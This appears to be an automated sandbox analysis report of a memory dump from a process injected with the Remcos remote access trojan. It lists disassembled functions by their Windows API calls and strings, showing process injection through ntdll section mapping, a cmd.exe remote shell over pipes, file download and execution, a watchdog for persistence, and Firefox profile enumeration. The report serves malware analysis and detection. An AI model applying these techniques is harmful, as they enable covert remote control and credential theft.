                                                                                                                                        • Instruction Fuzzy Hash: A0E0D83646820BEAFB11EEB498156FD37D8EB011C1F100536B851C115ECB39EB90F121
                                                                                                                                        APIs
                                                                                                                                        • GetForegroundWindow.USER32 ref: 0041BB49
                                                                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BB5C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ForegroundText
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 29597999-0
                                                                                                                                        • Opcode ID: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                                                                                        • Instruction ID: 8c7c0eb369f00208a7459315ff6bb8442305c4ed6b2016914032ba092e23deac
                                                                                                                                        • Opcode Fuzzy Hash: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                                                                                        • Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00438E14: try_get_function.LIBVCRUNTIME ref: 00438E29
                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A48A
                                                                                                                                        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A495
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 806969131-0
                                                                                                                                        • Opcode ID: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                                                                                                        • Instruction ID: eb5cae5cbee30b1ad319c652a9e61f9a188d1dba44d7e0681113cf8ff6ee03f7
                                                                                                                                        • Opcode Fuzzy Hash: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                                                                                                        • Instruction Fuzzy Hash: 34D0A725584340141C04A279381B19A1348193A778F70725FF5A0C51D2EEDD4070512F
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
                                                                                                                                        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 806969131-0
                                                                                                                                        • Opcode ID: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                                                                                        • Instruction ID: 7b09b9f0a56a55c342e0a0cde292dff0536b901afa775ab746cb2a45ce2dbbc5
                                                                                                                                        • Opcode Fuzzy Hash: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                                                                                        • Instruction Fuzzy Hash: 50D0223A8087431CF80BC6BD2C67A8B23CCCB421F4360C2A6F7209A0CDEF60E0046322
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                                                                                          • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                                                                                          • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                                                                                          • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                                                                                          • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                                                                                          • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                                                                                          • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                                                                                          • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                                                                                          • Part of subcall function 0041812A: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                                                                                          • Part of subcall function 0041812A: VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                                                                                        • CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                                                                        • CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Handle$AddressModuleProc$Close$AllocCreateProcessVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2948481953-0
                                                                                                                                        • Opcode ID: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
                                                                                                                                        • Instruction ID: c73268819cb60d4ae5e82c4b87b0b0ed6d20300d6cd2269ac6e8254bb02e1260
                                                                                                                                        • Opcode Fuzzy Hash: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
                                                                                                                                        • Instruction Fuzzy Hash: 4FD05E76C4120CFFCB006BA4AC0E8AEB77CFB09211B50116AEC2442252AA369D188A64
                                                                                                                                        APIs
                                                                                                                                        • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __crt_fast_encode_pointer
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3768137683-0
                                                                                                                                        • Opcode ID: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                                                                        • Instruction ID: bece27fcde9612dcc576c905fc453b1e46dde912844247b60aafe4dc7e802519
                                                                                                                                        • Opcode Fuzzy Hash: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                                                                                                        • Instruction Fuzzy Hash: D0118F37A007259FFB26DE18DD9095B73E5EB843E17168220ED18AB258DA32EC0196A1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                                                                                                                        • Instruction ID: 3af98ca860494c99acd04ebe2bb4cc6dc665ec8dea8eb108ba88c8789d347e54
                                                                                                                                        • Opcode Fuzzy Hash: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                                                                                                                        • Instruction Fuzzy Hash: 9411E3B27201019FD7149B18C860BA6B766FF50710F5942AAE256CB3B2DB35EC91CA98
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __alldvrm
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 65215352-0
                                                                                                                                        • Opcode ID: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                                                                                                                        • Instruction ID: 3aa9a871bb282a4e2fa9f206226bba5a96c76ae51e783e445703a1682bb04715
                                                                                                                                        • Opcode Fuzzy Hash: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                                                                                                                        • Instruction Fuzzy Hash: 51014CB2950308BFDB24EF64C902B6EBBECEB04328F10452FE445D7201C278AD40C75A
                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                        • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                                                                        • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                                                                                                        • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                                                                        • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                                                                                                                        APIs
                                                                                                                                        • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Startup
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 724789610-0
                                                                                                                                        • Opcode ID: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                                                                                        • Instruction ID: 97c3e6bab4f4407137ad71e204409d8be70fba83985c90e8682379c152a4c00d
                                                                                                                                        • Opcode Fuzzy Hash: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                                                                                        • Instruction Fuzzy Hash: 92D0123255C70C8EE620ABB4AD0F8A4775CC317616F0007BA6CB5836D3E6405B1DC2AB
                                                                                                                                        APIs
                                                                                                                                        • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Deallocatestd::_
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1323251999-0
                                                                                                                                        • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                                                                        • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                                                                                                                                        • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                                                                        • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: recv
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1507349165-0
                                                                                                                                        • Opcode ID: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                                                                                        • Instruction ID: c63eaffdb417a6470c671315a396a42075a312041b5b8b5670d44767818a4bbd
                                                                                                                                        • Opcode Fuzzy Hash: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                                                                                        • Instruction Fuzzy Hash: 26B09279108202FFCA150B60CC0886ABEA6ABC8382B00882DB586411B0C736C851AB26
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: send
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2809346765-0
                                                                                                                                        • Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                                                                                        • Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
                                                                                                                                        • Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                                                                                        • Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                        • Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                                                                                        • Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
                                                                                                                                        • Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                                                                                                        • Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06
                                                                                                                                        APIs
                                                                                                                                        • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                                                                                                        • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                                                                                                        • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                                                                                                          • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,@0O,004752F0,00000001), ref: 0041C37D
                                                                                                                                          • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,@0O,004752F0,00000001), ref: 0041C3AD
                                                                                                                                          • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,@0O,004752F0,00000001), ref: 0041C402
                                                                                                                                          • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,@0O,004752F0,00000001), ref: 0041C463
                                                                                                                                          • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,@0O,004752F0,00000001), ref: 0041C46A
                                                                                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                          • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                                                          • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                                                                                                        • GetLogicalDriveStringsA.KERNEL32 ref: 004082B3
                                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                                                                                                        • DeleteFileA.KERNEL32(?), ref: 0040868D
                                                                                                                                          • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                                                                                                                                          • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                                                                                                          • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                                                                                                          • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                                                                                                        • Sleep.KERNEL32(000007D0), ref: 00408733
                                                                                                                                        • StrToIntA.SHLWAPI(00000000), ref: 00408775
                                                                                                                                          • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                                                                                                                                        • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                                                                                                                                        • API String ID: 1067849700-181434739
                                                                                                                                        • Opcode ID: 3817d59f13ca8fe8e185b4014e92b89e3ece5399662c1fa5bb97dafb16bc065d
                                                                                                                                        • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                                                                                                                                        • Opcode Fuzzy Hash: 3817d59f13ca8fe8e185b4014e92b89e3ece5399662c1fa5bb97dafb16bc065d
                                                                                                                                        • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                                                                                                                                        APIs
                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 004056E6
                                                                                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00405723
                                                                                                                                        • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                                                                                                                                        • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                                                                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                                                                                                                                        • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                                                                                                                                        • PeekNamedPipe.KERNEL32 ref: 004058BC
                                                                                                                                        • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                                                                                                                                          • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                                                        • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                                                                                                                                        • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                                                                                                                                        • CloseHandle.KERNEL32 ref: 00405A23
                                                                                                                                        • CloseHandle.KERNEL32 ref: 00405A2B
                                                                                                                                        • CloseHandle.KERNEL32 ref: 00405A3D
                                                                                                                                        • CloseHandle.KERNEL32 ref: 00405A45
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                                        • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                                                                                                                                        • API String ID: 2994406822-18413064
                                                                                                                                        • Opcode ID: d16286c7c38df6e2a78898b44b0a418d7ee8de31fdaa2db65b94654e283f2e3b
                                                                                                                                        • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                                                                                                                                        • Opcode Fuzzy Hash: d16286c7c38df6e2a78898b44b0a418d7ee8de31fdaa2db65b94654e283f2e3b
                                                                                                                                        • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00412141
                                                                                                                                          • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                                                          • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                                                                          • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                                                                                                                                        • OpenMutexA.KERNEL32 ref: 00412181
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00412190
                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                                                                                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                                                                                        • String ID: @0O$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                                                                                                                        • API String ID: 3018269243-3931600516
                                                                                                                                        • Opcode ID: a1d17eaa79687276733ec66dbf34ac3729f4deb925ccc61b392e9011f6d934ea
                                                                                                                                        • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                                                                                                                        • Opcode Fuzzy Hash: a1d17eaa79687276733ec66dbf34ac3729f4deb925ccc61b392e9011f6d934ea
                                                                                                                                        • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040BC04
                                                                                                                                        • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
